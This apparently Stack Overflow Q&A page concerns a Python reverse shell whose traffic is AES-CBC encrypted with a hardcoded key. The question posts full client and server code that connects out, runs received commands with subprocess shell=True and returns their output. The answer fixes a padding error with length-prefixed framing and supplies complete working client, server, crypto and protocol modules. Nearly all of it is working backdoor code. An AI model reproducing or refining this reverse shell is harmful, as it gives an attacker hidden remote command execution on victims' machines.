Search code examples
pythonshellaespycryptodome

Python cryptodome AES-CBC / subprocess large command output issues


I have the following code for a simple client/server reverse shell in python3.

it will connect fine, and any command with a small output it will work great. commands like "whoami" and listing the contents of a directory with one or two files. The issue seems to be with any command that gives a large output eg) listing all files in a large directory, or the "ipconfig /all" command. This will crash the program with "ValueError: Padding is incorrect".

Im sure it is somthing simple, but i am very new to this and am unsure. Thank you

client.py

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding
import socket
import subprocess
key = b"H" * 32
IV = b"H" * 16

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def connect():
    s = socket.socket()
    s.connect(('192.168.0.2', 8080))
    while True:
        command = decrypt(s.recv(1024))
        if 'leave' in command.decode():
             break
        else:
            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE,           stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            s.send(encrypt(CMD.stdout.read()))
    

def main():
    connect()
main()

server.py

import socket

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding

IV = b"H" * 16
key = b"H" * 32

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def connect():

    s = socket.socket()
    s.bind(('192.168.0.2', 8080))
    s.listen(1)
    conn, address = s.accept()
    print('Connected')
    while True:

        command = input("Shell> ")
        if 'leave' in command:
            conn.send(encrypt(b'leave'))
            conn.close()
            break
        else:
            command = encrypt(command.encode())
            conn.send(command)
            print(decrypt(conn.recv(1024)).decode())
def main():
    connect()

main()

Solution

  •     print(decrypt(conn.recv(1024)).decode())
    

    The problem is that conn.recv(1024) only reads up to 1024 bytes, whereas the output for the bigger commands is probably more than 1024 bytes in size, leading to incomplete ciphertext being received.

    Note that a single read can fewer bytes too, so we don't really know how much we have to read since TCP is a streaming protcol.

    A simple fix for that is to prefix each message with ciphertext length. Using 4 bytes (32 bits) for maximum cipher text side the message looks like the following:

    [p1,p2,p3,p4][c1,c2,c3...] where p1..p4 are the 4 prefix bytes and c1... cn are the cipher text bytes.

    So, now when we start reading a message, we first read 4 bytes, interpreting these as an integer gives us the size of the following cipher text.

    A sample implementation:

    client.py

    import socket
    import subprocess
    
    from protocol import read_msg, write_msg
    
    
    def connect():
        s = socket.socket()
        s.connect(('localhost', 4040))
        while True:
            command = read_msg(s)
            print("command %s" % command)
            if 'leave' in command.decode():
                break
            else:
                CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE,
                                       stdout=subprocess.PIPE)
                write_msg(s, CMD.stdout.read())
    
    
    def main():
        connect()
    
    main()
    

    crypto.py

    from Crypto.Util import Padding
    from Crypto.Cipher import AES
    
    key = b"H" * 32
    IV = b"H" * 16
    
    
    def encrypt(message):
        encryptor = AES.new(key, AES.MODE_CBC, IV)
        padded_message = Padding.pad(message, 16)
        encrypted_message = encryptor.encrypt(padded_message)
        return encrypted_message
    
    
    def decrypt(cipher):
        decryptor = AES.new(key, AES.MODE_CBC, IV)
        decrypted_padded_message = decryptor.decrypt(cipher)
        decrypted_message = Padding.unpad(decrypted_padded_message, 16)
        return decrypted_message
    

    protocol.py

    from crypto import encrypt, decrypt
    
    
    def read_msg(s):
        max_buffer_size = 1024
    
        length_buffer = b""
        while True:
            if len(length_buffer) == 4:
                break
            b = s.recv(1)
            length_buffer += b
        message_length = int.from_bytes(length_buffer, "big")
        message_buffer = b""
    
        read_size = min(message_length, max_buffer_size)
    
        to_read = message_length
        while to_read != 0:
            read = s.recv(read_size)
            message_buffer += read
            to_read -= len(read)
    
        return decrypt(message_buffer)
    
    
    def write_msg(s, message):
        encrypted_message = encrypt(message)
        message_length = len(encrypted_message)
        message_length_raw = message_length.to_bytes(4, "big")
        s.send(message_length_raw + encrypt(message))
    

    server.py

    import socket
    
    from protocol import write_msg, read_msg
    
    
    def connect():
    
        s = socket.socket()
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('localhost', 4040))
        s.listen(1)
        conn, address = s.accept()
        print('Connected')
        while True:
    
            command = input("Shell> ")
            if 'leave' in command:
                write_msg(conn, b'leave')
                conn.close()
                break
            else:
                write_msg(conn, command.encode())
                print(read_msg(conn).decode())
    def main():
        connect()
    
    main()